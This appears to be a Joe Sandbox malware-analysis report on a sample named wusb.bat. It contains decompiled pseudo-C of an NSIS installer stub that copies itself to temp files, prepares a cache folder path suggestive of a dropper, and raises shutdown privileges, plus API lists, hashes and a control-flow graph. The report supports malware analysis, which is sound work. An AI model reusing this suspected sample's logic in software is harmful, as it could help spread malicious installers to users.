									__eflags = _t72 - 0xffffffff;
									if(_t72 != 0xffffffff) {
										 *(_t197 + 0x10) = _t72;
									}
									ExitProcess( *(_t197 + 0x10));
								}
								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
								__eflags = _t75;
								if(_t75 != 0) {
									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
									 *(_t197 + 0x34) = 1;
									 *(_t197 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
								}
								_t76 = E00406626(4);
								__eflags = _t76 - _t151;
								if(_t76 == _t151) {
									L70:
									_t77 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
									__eflags = _t79;
									if(_t79 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E004058AE( *(_t197 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x42a220 == _t151) {
							L47:
							 *0x42a2cc =  *0x42a2cc | 0xffffffff;
							 *(_t197 + 0x14) = E0040395A( *0x42a2cc);
							goto L48;
						}
						_t184 = E00405B4A(_t193, _t151);
						if(_t184 < _t193) {
							L44:
							_t236 = _t184 - _t193;
							 *(_t197 + 0x10) = L"Error launching installer";
							if(_t184 < _t193) {
								_t182 = E00405819(_t239);
								lstrcatW(_t172, L"~nsu");
								if(_t182 != _t151) {
									lstrcatW(_t172, "A");
								}
								lstrcatW(_t172, L".tmp");
								_t195 = L"C:\\Users\\Public";
								if(lstrcmpiW(_t172, L"C:\\Users\\Public") != 0) {
									_push(_t172);
									if(_t182 == _t151) {
										E004057FC();
									} else {
										E0040577F();
									}
									SetCurrentDirectoryW(_t172);
									_t243 = L"C:\\Users\\alfons\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth" - _t151; // 0x43
									if(_t243 == 0) {
										E0040624C(L"C:\\Users\\alfons\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t195);
									}
									E0040624C(0x42b000,  *(_t197 + 0x18));
									_t156 = "A" & 0x0000ffff;
									 *0x42b800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t196 = 0x1a;
									do {
										E0040626E(_t151, _t172, 0x420ea8, 0x420ea8,  *((intOrPtr*)( *0x42a214 + 0x120)));
										DeleteFileW(0x420ea8);
										if( *(_t197 + 0x10) != _t151 && CopyFileW(0x438800, 0x420ea8, 1) != 0) {
											E00406012(_t156, 0x420ea8, _t151);
											E0040626E(_t151, _t172, 0x420ea8, 0x420ea8,  *((intOrPtr*)( *0x42a214 + 0x124)));
											_t103 = E00405831(0x420ea8);
											if(_t103 != _t151) {
												CloseHandle(_t103);
												 *(_t197 + 0x10) = _t151;
											}
										}
										 *0x42b800 =  *0x42b800 + 1;
										_t196 = _t196 - 1;
									} while (_t196 != 0);
									E00406012(_t156, _t172, _t151);
								}
								goto L48;
							}
							 *_t184 = _t151;
							_t185 =  &(_t184[2]);
							if(E00405C25(_t236,  &(_t184[2])) == 0) {
								goto L48;
							}
							E0040624C(L"C:\\Users\\alfons\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t185);
							E0040624C(L"C:\\Users\\alfons\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t185);
							 *(_t197 + 0x10) = _t151;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t159 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t120 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
						while( *_t184 != _t159 || _t184[1] != _t120) {
							_t184 = _t184;
							if(_t184 >= _t193) {
								continue;
							}
							break;
						}
						_t151 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t172, 0x3fb);
					lstrcatW(_t172, L"\\Temp");
					_t123 = E0040330C(_t155, _t225);
					_t226 = _t123;
					if(_t123 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t172);
					lstrcatW(_t172, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t172);
					SetEnvironmentVariableW(L"TMP", _t172);
					_t128 = E0040330C(_t155, _t226);
					_t227 = _t128;
					if(_t128 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t154 = 0x20;
						if(_t66 != _t154) {
							L13:
							if( *_t155 == 0x22) {
								_t155 = _t155 + 2;
								_t154 = 0x22;
							}
							if( *_t155 != 0x2f) {
								goto L27;
							} else {
								_t155 = _t155 + 2;
								if( *_t155 == 0x53) {
									_t148 =  *((intOrPtr*)(_t155 + 2));
									if(_t148 == 0x20 || _t148 == 0) {
										 *0x42a2c0 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t169 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t175 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t169;
								if( *_t155 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
									_t147 =  *((intOrPtr*)(_t155 + 8));
									if(_t147 == 0x20 || _t147 == 0) {
										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t164 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t178 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t164;
								if( *(_t155 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
									goto L27;
								} else {
									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
									__eflags = _t155;
									E0040624C(L"C:\\Users\\alfons\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t155);
									L32:
									_t151 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t155 = _t155 + 2;
						} while ( *_t155 == _t154);
						goto L13;
						L27:
						_t155 = E00405B4A(_t155, _t154);
						if( *_t155 == 0x22) {
							_t155 = _t155 + 2;
						}
						_t66 =  *_t155;
					} while (_t66 != 0);
					goto L32;
				}
				L4:
				E004065B6(_t179); // executed
				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
				if( *_t179 != 0) {
					goto L4;
				} else {
					E00406626(0xa);
					 *0x42a204 = E00406626(8);
					_t56 = E00406626(6);
					if(_t56 != _t151) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x42a20f =  *0x42a20f | 0x00000040;
						}
					}
					goto L8;
				}
			}








































                                                        0x00403348
                                                        0x00403349
                                                        0x00403350
                                                        0x00403354
                                                        0x0040335c
                                                        0x00403360
                                                        0x0040336c
                                                        0x00403375
                                                        0x0040337a
                                                        0x0040337d
                                                        0x00403384
                                                        0x0040338b
                                                        0x0040338b
                                                        0x00403384
                                                        0x0040338d
                                                        0x0040338d
                                                        0x004033d5
                                                        0x004033d6
                                                        0x004033dd
                                                        0x004033e3
                                                        0x004033f9
                                                        0x00403409
                                                        0x0040340e
                                                        0x00403414
                                                        0x0040341b
                                                        0x0040342f
                                                        0x00403434
                                                        0x00403436
                                                        0x0040343a
                                                        0x0040343f
                                                        0x0040343f
                                                        0x0040344e
                                                        0x00403450
                                                        0x00403454
                                                        0x0040345a
                                                        0x00403571
                                                        0x00403577
                                                        0x00403582
                                                        0x00403584
                                                        0x00403589
                                                        0x0040358b
                                                        0x004035e3
                                                        0x004035e8
                                                        0x004035f2
                                                        0x004035f9
                                                        0x004035fd
                                                        0x004036ae
                                                        0x004036ae
                                                        0x004036b3
                                                        0x004036b9
                                                        0x004036be
                                                        0x004037e4
                                                        0x004037ea
                                                        0x00403868
                                                        0x00403868
                                                        0x0040386d
                                                        0x00403870
                                                        0x00403872
                                                        0x00403872
                                                        0x0040387a
                                                        0x0040387a
                                                        0x004037fa
                                                        0x00403800
                                                        0x00403802
                                                        0x0040380f
                                                        0x00403822
                                                        0x0040382a
                                                        0x00403832
                                                        0x00403832
                                                        0x0040383a
                                                        0x0040383f
                                                        0x00403846
                                                        0x00403854
                                                        0x00403857
                                                        0x0040385d
                                                        0x0040385f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403848
                                                        0x0040384e
                                                        0x00403850
                                                        0x00403852
                                                        0x00403861
                                                        0x00403863
                                                        0x00000000
                                                        0x00403863
                                                        0x00000000
                                                        0x00403852
                                                        0x00403846
                                                        0x004036cd
                                                        0x004036d4
                                                        0x004036d4
                                                        0x00403609
                                                        0x0040369e
                                                        0x0040369e
                                                        0x004036aa
                                                        0x00000000
                                                        0x004036aa
                                                        0x00403616
                                                        0x0040361a
                                                        0x00403668
                                                        0x00403668
                                                        0x0040366a
                                                        0x00403672
                                                        0x004036e5
                                                        0x004036e7
                                                        0x004036ee
                                                        0x004036f6
                                                        0x004036f6
                                                        0x00403701
                                                        0x00403706
                                                        0x00403715
                                                        0x00403719
                                                        0x0040371a
                                                        0x00403723
                                                        0x0040371c
                                                        0x0040371c
                                                        0x0040371c
                                                        0x00403729
                                                        0x0040372f
                                                        0x00403736
                                                        0x0040373e
                                                        0x0040373e
                                                        0x0040374c
                                                        0x00403758
                                                        0x00403766
                                                        0x0040376b
                                                        0x00403771
                                                        0x0040377d
                                                        0x00403783
                                                        0x0040378d
                                                        0x004037a3
                                                        0x004037b4
                                                        0x004037ba
                                                        0x004037c1
                                                        0x004037c4
                                                        0x004037ca
                                                        0x004037ca
                                                        0x004037c1
                                                        0x004037ce
                                                        0x004037d5
                                                        0x004037d5
                                                        0x004037da
                                                        0x004037da
                                                        0x00000000
                                                        0x00403715
                                                        0x00403674
                                                        0x00403677
                                                        0x00403682
                                                        0x00000000
                                                        0x00000000
                                                        0x0040368a
                                                        0x00403695
                                                        0x0040369a
                                                        0x00000000
                                                        0x0040369a
                                                        0x00403623
                                                        0x0040363b
                                                        0x0040364c
                                                        0x0040364d
                                                        0x00403651
                                                        0x00403653
                                                        0x00403661
                                                        0x00403664
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403664
                                                        0x00403666
                                                        0x00000000
                                                        0x00403666
                                                        0x00403593
                                                        0x0040359f
                                                        0x004035a4
                                                        0x004035a9
                                                        0x004035ab
                                                        0x00000000
                                                        0x00000000
                                                        0x004035b3
                                                        0x004035bb
                                                        0x004035cc
                                                        0x004035d4
                                                        0x004035d6
                                                        0x004035db
                                                        0x004035dd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403460
                                                        0x00403460
                                                        0x00403462
                                                        0x00403466
                                                        0x0040346f
                                                        0x00403473
                                                        0x00403478
                                                        0x00403479
                                                        0x00403479
                                                        0x0040347e
                                                        0x00000000
                                                        0x00403484
                                                        0x00403485
                                                        0x0040348a
                                                        0x0040348c
                                                        0x00403494
                                                        0x0040349b
                                                        0x0040349b
                                                        0x00403494
                                                        0x004034ac
                                                        0x004034bf
                                                        0x004034c0
                                                        0x004034d5
                                                        0x004034da
                                                        0x004034de
                                                        0x004034e7
                                                        0x004034ef
                                                        0x004034f6
                                                        0x004034f6
                                                        0x004034ef
                                                        0x00403502
                                                        0x00403515
                                                        0x00403516
                                                        0x0040352b
                                                        0x00403531
                                                        0x00403535
                                                        0x00000000
                                                        0x0040355c
                                                        0x0040355c
                                                        0x00403561
                                                        0x0040356a
                                                        0x0040356f
                                                        0x0040356f
                                                        0x00000000
                                                        0x0040356f
                                                        0x00403535
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403468
                                                        0x00403468
                                                        0x00403469
                                                        0x0040346a
                                                        0x00000000
                                                        0x0040353d
                                                        0x00403544
                                                        0x0040354a
                                                        0x0040354d
                                                        0x0040354d
                                                        0x0040354e
                                                        0x00403551
                                                        0x00000000
                                                        0x0040355a
                                                        0x00403392
                                                        0x00403393
                                                        0x0040339f
                                                        0x004033a6
                                                        0x00000000
                                                        0x004033a8
                                                        0x004033aa
                                                        0x004033b8
                                                        0x004033bd
                                                        0x004033c4
                                                        0x004033c8
                                                        0x004033cc
                                                        0x004033ce
                                                        0x004033ce
                                                        0x004033cc
                                                        0x00000000
                                                        0x004033c4

                                                        APIs
                                                        • SetErrorMode.KERNELBASE ref: 00403360
                                                        • GetVersion.KERNEL32 ref: 00403366
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                                        • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                                        • OleInitialize.OLE32(00000000), ref: 004033DD
                                                        • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                                        • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                                        • GetModuleHandleW.KERNEL32(00000000,"C:\Users\Public\wusb.bat" ,00000000,?,00000006,00000008,0000000A), ref: 00403421
                                                        • CharNextW.USER32(00000000,"C:\Users\Public\wusb.bat" ,00000020,?,00000006,00000008,0000000A), ref: 00403448
                                                          • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                          • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403582
                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040359F
                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B3
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035BB
                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
                                                        • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035E8
                                                          • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                        • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                                        • ExitProcess.KERNEL32 ref: 004036D4
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004036E7
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 004036F6
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403701
                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\Public,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\wusb.bat" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
                                                        • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                                        • CopyFileW.KERNEL32(00438800,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 00403797
                                                        • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037C4
                                                        • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                                        • ExitProcess.KERNEL32 ref: 0040387A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                        • String ID: "C:\Users\Public\wusb.bat" $.tmp$1033$C:\Users\Public$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                        • API String ID: 2488574733-3566971273
                                                        • Opcode ID: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                                        • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                                        • Opcode Fuzzy Hash: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                                        • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004053EF Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 139 4053ef-40540a 140 405410-4054d7 GetDlgItem * 3 call 404216 call 404b4d GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 405599-4055a0 139->141 159 4054f5-4054f8 140->159 160 4054d9-4054f3 SendMessageW * 2 140->160 143 4055a2-4055c4 GetDlgItem CreateThread FindCloseChangeNotification 141->143 144 4055ca-4055d7 141->144 143->144 145 4055f5-4055ff 144->145 146 4055d9-4055df 144->146 150 405601-405607 145->150 151 405655-405659 145->151 148 4055e1-4055f0 ShowWindow * 2 call 404216 146->148 149 40561a-405623 call 404248 146->149 148->145 163 405628-40562c 149->163 155 405609-405615 call 4041ba 150->155 156 40562f-40563f ShowWindow 150->156 151->149 153 40565b-405661 151->153 153->149 161 405663-405676 SendMessageW 153->161 155->149 164 405641-40564a call 4052b0 156->164 165 40564f-405650 call 4041ba 156->165 166 405508-40551f call 4041e1 159->166 167 4054fa-405506 SendMessageW 159->167 160->159 168 405778-40577a 161->168 169 40567c-4056a7 CreatePopupMenu call 40626e AppendMenuW 161->169 164->165 165->151 178 405521-405535 ShowWindow 166->178 179 405555-405576 GetDlgItem SendMessageW 166->179 167->166 168->163 176 4056a9-4056b9 GetWindowRect 169->176 177 4056bc-4056d1 TrackPopupMenu 169->177 176->177 177->168 180 4056d7-4056ee 177->180 181 405544 178->181 182 405537-405542 ShowWindow 178->182 179->168 183 40557c-405594 SendMessageW * 2 179->183 184 4056f3-40570e SendMessageW 180->184 185 40554a-405550 call 404216 181->185 182->185 183->168 184->184 186 405710-405733 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 405735-40575c SendMessageW 186->188 188->188 189 40575e-405772 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->168
                                                        C-Code - Quality: 95%
                                                        			E004053EF(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x4291e4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405383, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						FindCloseChangeNotification(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040626E(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x4236e8;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x4291cc == _t156) {
							ShowWindow( *0x42a208, 8);
							if( *0x42a2ac == _t156) {
								_t119 =  *0x4226c0; // 0x6d0ddc
								E004052B0( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E004041BA(_t171);
							goto L25;
						}
						 *0x421eb8 = 2;
						E004041BA(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404248(_a8, _a12, _a16);
						}
						ShowWindow( *0x4291d0, _t156);
						ShowWindow(_t169, 8);
						E00404216(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a214;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x4291d0 = GetDlgItem(_a4, 0x403);
				 *0x4291c8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x4291e4 = _t134;
				_v8 = _t134;
				E00404216( *0x4291d0);
				 *0x4291d4 = E00404B4D(4);
				 *0x4291ec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004041E1(_a4);
				if(( *0x42a21c & 0x00000003) != 0) {
					ShowWindow( *0x4291d0, _t156);
					if(( *0x42a21c & 0x00000002) != 0) {
						 *0x4291d0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404216( *0x4291c8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a21c & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}



































                                                        0x004053f7
                                                        0x004053fd
                                                        0x00405407
                                                        0x0040540a
                                                        0x004055a0
                                                        0x004055bd
                                                        0x004055c4
                                                        0x004055c4
                                                        0x004055d7
                                                        0x004055f5
                                                        0x004055f7
                                                        0x004055ff
                                                        0x00405655
                                                        0x00405659
                                                        0x00000000
                                                        0x00000000
                                                        0x0040565b
                                                        0x00405661
                                                        0x00000000
                                                        0x00000000
                                                        0x0040566b
                                                        0x00405673
                                                        0x00405676
                                                        0x00405778
                                                        0x00000000
                                                        0x00405778
                                                        0x00405685
                                                        0x00405690
                                                        0x00405699
                                                        0x004056a4
                                                        0x004056a7
                                                        0x004056b0
                                                        0x004056b6
                                                        0x004056b9
                                                        0x004056b9
                                                        0x004056d1
                                                        0x004056da
                                                        0x004056dd
                                                        0x004056e4
                                                        0x004056eb
                                                        0x004056f3
                                                        0x004056f3
                                                        0x0040570a
                                                        0x0040570a
                                                        0x00405711
                                                        0x00405717
                                                        0x00405723
                                                        0x0040572a
                                                        0x00405733
                                                        0x00405735
                                                        0x00405738
                                                        0x00405747
                                                        0x0040574a
                                                        0x00405750
                                                        0x00405751
                                                        0x00405757
                                                        0x00405758
                                                        0x00405759
                                                        0x00405761
                                                        0x0040576c
                                                        0x00405772
                                                        0x00405772
                                                        0x00000000
                                                        0x004056d1
                                                        0x00405607
                                                        0x00405637
                                                        0x0040563f
                                                        0x00405641
                                                        0x0040564a
                                                        0x0040564a
                                                        0x00405650
                                                        0x00000000
                                                        0x00405650
                                                        0x0040560b
                                                        0x00405615
                                                        0x00000000
                                                        0x004055d9
                                                        0x004055df
                                                        0x0040561a
                                                        0x00000000
                                                        0x00405623
                                                        0x004055e8
                                                        0x004055ed
                                                        0x004055f0
                                                        0x00000000
                                                        0x004055f0
                                                        0x004055d7
                                                        0x00405410
                                                        0x00405414
                                                        0x0040541c
                                                        0x00405420
                                                        0x00405423
                                                        0x00405426
                                                        0x00405429
                                                        0x0040542c
                                                        0x0040542d
                                                        0x0040542e
                                                        0x00405447
                                                        0x0040544a
                                                        0x00405454
                                                        0x00405463
                                                        0x0040546b
                                                        0x00405473
                                                        0x00405478
                                                        0x0040547b
                                                        0x00405487
                                                        0x00405490
                                                        0x00405499
                                                        0x004054bb
                                                        0x004054c1
                                                        0x004054d2
                                                        0x004054d7
                                                        0x004054e5
                                                        0x004054f3
                                                        0x004054f3
                                                        0x004054f8
                                                        0x00405506
                                                        0x00405506
                                                        0x0040550b
                                                        0x0040550e
                                                        0x00405513
                                                        0x0040551f
                                                        0x00405528
                                                        0x00405535
                                                        0x00405544
                                                        0x00405537
                                                        0x0040553c
                                                        0x0040553c
                                                        0x00405550
                                                        0x00405550
                                                        0x00405564
                                                        0x0040556d
                                                        0x00405576
                                                        0x00405586
                                                        0x00405592
                                                        0x00405592
                                                        0x00000000

                                                        APIs
                                                        • GetDlgItem.USER32 ref: 0040544D
                                                        • GetDlgItem.USER32 ref: 0040545C
                                                        • GetClientRect.USER32 ref: 00405499
                                                        • GetSystemMetrics.USER32 ref: 004054A0
                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
